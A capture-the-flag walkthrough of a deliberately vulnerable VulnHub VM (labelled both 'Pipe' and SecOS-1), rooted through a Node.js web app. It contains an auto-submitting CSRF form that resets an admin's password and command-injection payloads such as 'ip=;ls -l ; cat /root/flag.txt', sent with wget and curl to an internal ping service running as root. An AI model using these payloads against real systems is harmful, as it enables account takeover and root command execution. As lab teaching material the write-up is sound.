Mission: Get the root flag on `Pipe`, a deliberately vulnerable virtual machine hosted at https://www.vulnhub.com/. The virtual machine can be downloaded at https://www.vulnhub.com/entry/secos-1,88/. I quickly loaded the virtual machine into my VMware Player and I was good to go!
Detailed Steps for getting root:
I ran a quick arp-scan to identify the IP address of the Pipe VM. I use `host-only` networking for both my Pipe VM and Kali box.
```text
# arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.28.1 00:50:56:c0:00:01 VMware, Inc.
192.168.28.138 00:0c:29:9a:5b:b1 VMware, Inc.
192.168.28.254 00:50:56:eb:e9:c7 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.086 seconds (122.72 hosts/sec). 3 responded
```
We identify the IP address of the new VM as 192.168.28.138.
An nmap scan of the box shows that it is running an HTTP service on port 8081 and an SSH service on port 22.
```text
Host is up (0.00065s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 9b:d9:32:f5:1d:19:88:d3:e7:af:f0:4e:21:76:7a:c8 (DSA)
| 2048 90:b0:3d:99:ed:5b:1b:e1:d4:e6:b5:dd:e9:70:89:f5 (RSA)
|_ 256 78:2a:d9:e3:63:83:24:dc:2a:d4:f6:4a:ac:2c:70:5a (ECDSA)
8081/tcp open http Node.js (Express middleware)
|_http-methods: GET
|_http-title: Secure Web App
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=1/8%Time=56908E80%P=i686-pc-linux-gnu%r(NULL,27
SF:,"SSH-2\.0-OpenSSH_6\.6p1\x20Ubuntu-2ubuntu1\r\n");
MAC Address: 00:0C:29:9A:5B:B1 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Uptime guess: 198.048 days (since Wed Jun 24 23:28:37 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=251 (Good luck!)
IP ID Sequence Generation: All zeros
```
We run nikto against the webserver but don't find anything of much interest. We then run dirbuster against the webserver, which reveals a bunch of interesting directories that we should look into.
It seems that the vulnerable application allows us to create a user account and look at the various pages on the website. Among other things, we see that there are 3 users on the box, one of whom is the administrator. There is also a way to send messages to the admin.
We also see an About page that tells us that the site has been developed using Node.js and MongoDB. At this point we try the authentication bypass seen in Node.js and MongoDB systems; a good discussion of it is in "Hacking Node.js and MongoDB" (http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html). It seems that the box is not vulnerable to this bypass. We begin to observe the webapp more closely and find that the login page source code contains a comment which is a hint.
We have a look at the /hint page and its source code, which reveals that we should launch a CSRF-style attack on the administrator.
The hint page tells us that the administrator will visit any site running on 127.0.0.1 if he is asked to do so. The hint is clear that we should feed the administrator a URL to visit. This can be done via the messaging feature of the webapp, which allows us to send messages to the administrator. Looking at the webapp again, we see that there is a feature to change the password. We decide to trick the admin into changing his password to one we specify. For this we create an HTML page with hidden inputs that POSTs the data to /change-password.
```html
<html>
<body>
<form name="changepass" method="post" action="http://127.0.0.1:8081/change-password">
<input type="hidden" name="username" value="spiderman">
<input type="hidden" name="password" value="abc123">
</form>
<script type="text/javascript">
document.changepass.submit();
</script>
</body>
</html>
```
We now ask the admin to view this page by sending him a message.
We hope that when the admin visits this page his password will get reset and we can log in. After a few minutes we try logging in as admin and see that our little trick has worked!
We log in to the admin's message board and see that he has a message from a user 'pirate' who claims to have cracked his password.
We try ssh'ing into the box with these credentials and are immediately logged in!
Once we log in we see that there are a bunch of interesting files in the user's home directory.
```text
spiderman@SecOS-1:~/vnwa$ ls -lrt
total 44
-rw-rw-r-- 1 spiderman spiderman 559 May 4 2014 package.json
-rw-rw-r-- 1 spiderman spiderman 1070 May 4 2014 LICENSE
drwxrwxr-x 2 spiderman spiderman 4096 May 4 2014 views
drwxrwxr-x 6 spiderman spiderman 4096 May 4 2014 node_modules
drwxrwxr-x 4 spiderman spiderman 4096 May 4 2014 public
-rwxrwxr-x 1 spiderman spiderman 7772 May 4 2014 server.js
drwxrwxr-x 2 spiderman spiderman 4096 May 5 2014 lib
drwxrwxr-x 2 spiderman spiderman 4096 May 7 2014 scripts
-rwxrwxr-x 1 spiderman spiderman 1981 Jan 10 01:00 internalServer.js.2
-rw-rw-r-- 1 spiderman spiderman 0 Jan 10 01:22 headers
-rwxrwxr-x 1 spiderman spiderman 1981 Jan 10 01:29 internalServer.js
spiderman@SecOS-1:~/vnwa$ ls -l views/
total 64
-rw-rw-r-- 1 spiderman spiderman 591 May 4 2014 about.ejs
-rw-rw-r-- 1 spiderman spiderman 13861 May 4 2014 bootstrap.ejs
-rw-rw-r-- 1 spiderman spiderman 740 May 4 2014 change-password.ejs
-rw-rw-r-- 1 spiderman spiderman 18 May 4 2014 footer.ejs
-rw-rw-r-- 1 spiderman spiderman 2048 May 4 2014 header.ejs
-rw-rw-r-- 1 spiderman spiderman 548 May 4 2014 hint.ejs
-rw-rw-r-- 1 spiderman spiderman 498 May 4 2014 index.ejs
-rw-rw-r-- 1 spiderman spiderman 754 May 4 2014 login.ejs
-rw-rw-r-- 1 spiderman spiderman 690 May 4 2014 messages.ejs
-rw-rw-r-- 1 spiderman spiderman 2114 May 4 2014 ping.ejs
-rw-rw-r-- 1 spiderman spiderman 910 May 4 2014 send-message.ejs
-rw-rw-r-- 1 spiderman spiderman 697 May 4 2014 sign-up.ejs
-rw-rw-r-- 1 spiderman spiderman 646 May 4 2014 users.ejs
spiderman@SecOS-1:~/vnwa$
```
If we do a quick directory listing, two things stand out: i) there is an internalServer running as root on the box; ii) there is an additional ping.ejs file which is not normally visible via the public-facing web interface.
We look at the contents of both the internalServer.js and ping.ejs files.
```html
<body role="document">
<!-- Fixed navbar -->
<div class="navbar navbar-inverse navbar-fixed-top" role="navigation">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
<span class="sr-only">Toggle navigation</span>
</button>
<a class="navbar-brand" href="/">Internal admin tools</a>
</div>
<div class="navbar-collapse collapse">
<ul class="nav navbar-nav">
</ul>
</div><!--/.nav-collapse -->
</div>
</div>
<div class="container">
<form class="form-signin" action="/" method="POST">
<h4 class="form-signin-heading">Enter the IP you want to ping</h4>
<input type="text" class="input-block-level" placeholder="127.0.0.1" name="ip"><br />
<button class="btn btn-large btn-primary" type="submit">Ping !</button>
</form>
<% if (typeof message != "undefined" && message != null && message != "") { %>
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Ping result</h3>
</div>
<div class="panel-body"><%= message %></div>
</div>
<% } %>
</div> <!-- /container -->
```
It seems that besides the public-facing webapp there is an additional server running on the box on port 9000. This server provides a ping capability, presumably so the admin can ping other systems. When we look at the code for the ping service we see that the `exec` API is called with the user-provided IP address without any input checks. We can inject commands here because the application does not sanitize the input data.
We can launch the command injection either via the web browser or from the command line. Let's see both approaches.
a) Command line: We can use wget or curl to POST data to the internal server and inject our command in the POST body.
```text
wget --post-data="ip=1;id" localhost:9000
--2016-01-10 01:44:34-- http://localhost:9000/
Resolving localhost (localhost)... ::1, 127.0.0.1
Connecting to localhost (localhost)|::1|:9000... failed: Connection refused.
Connecting to localhost (localhost)|127.0.0.1|:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2048 (2.0K) [text/html]
.......
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Ping result</h3>
</div>
<div class="panel-body">uid=0(root) gid=0(root) groups=0(root)
</div>
</div>
</div> <!-- /container -->
```
Here we send a POST request with an IP address of 1 and inject our 'id' command along with it.
Similarly, we can use curl to POST the data.
```text
curl --data "ip=;ls -l ; cat /root/flag.txt" localhost:9000
....
.....
/div>
<div class="panel-body">total 77
drwxr-xr-x 2 root root 4096 Apr 25 2014 bin
drwxr-xr-x 4 root root 1024 Apr 25 2014 boot
drwxr-xr-x 15 root root 4100 Jan 10 00:40 dev
drwxr-xr-x 90 root root 4096 Jan 10 00:40 etc
drwxr-xr-x 4 root root 4096 Apr 25 2014 home
lrwxrwxrwx 1 root root 33 Apr 25 2014 initrd.img -> boot/initrd.img-3.13.0-24-generic
drwxr-xr-x 21 root root 4096 Apr 25 2014 lib
drwx------ 2 root root 16384 Apr 25 2014 lost+found
drwxr-xr-x 3 root root 4096 Apr 25 2014 media
drwxr-xr-x 2 root root 4096 Apr 11 2014 mnt
drwxr-xr-x 4 root root 4096 Apr 25 2014 opt
dr-xr-xr-x 312 root root 0 Jan 10 00:40 proc
drwx------ 2 root root 4096 May 5 2014 root
drwxr-xr-x 18 root root 640 Jan 10 00:41 run
drwxr-xr-x 2 root root 12288 Apr 25 2014 sbin
drwxr-xr-x 2 root root 4096 Apr 16 2014 srv
dr-xr-xr-x 13 root root 0 Jan 10 00:40 sys
drwxrwxrwt 2 root root 4096 Jan 10 01:42 tmp
drwxr-xr-x 10 root root 4096 Apr 25 2014 usr
drwxr-xr-x 12 root root 4096 Apr 25 2014 var
lrwxrwxrwx 1 root root 30 Apr 25 2014 vmlinuz -> boot/vmlinuz-3.13.0-24-generic
Hey,
Congrats, you did it !
The flag for this first (VM) is: MickeyMustNotDie.
Keep this flag because it will be needed for the next VM.
If you liked the Web application, the code is available on Github.
(https://github.com/PaulSec/VNWA)
There should be more VMs to come in the next few weeks/months.
Twitter: @PaulWebSec
GitHub : PaulSec
</div>
</div>
</div> <!-- /container -->
</body>
</html>
```
b) Web browser: In order to see the internal webapp from our attacking machine we use SSH local port forwarding (the ssh -L option). Via this method we make port 9000 of the victim machine available on our Kali machine at port 4545.
```text
ssh -L 4545:127.0.0.1:9000 spiderman@192.168.28.138
spiderman@192.168.28.138's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
...
...
```
Now we can access port 9000 of the internal web application from the Kali machine's browser via port 4545.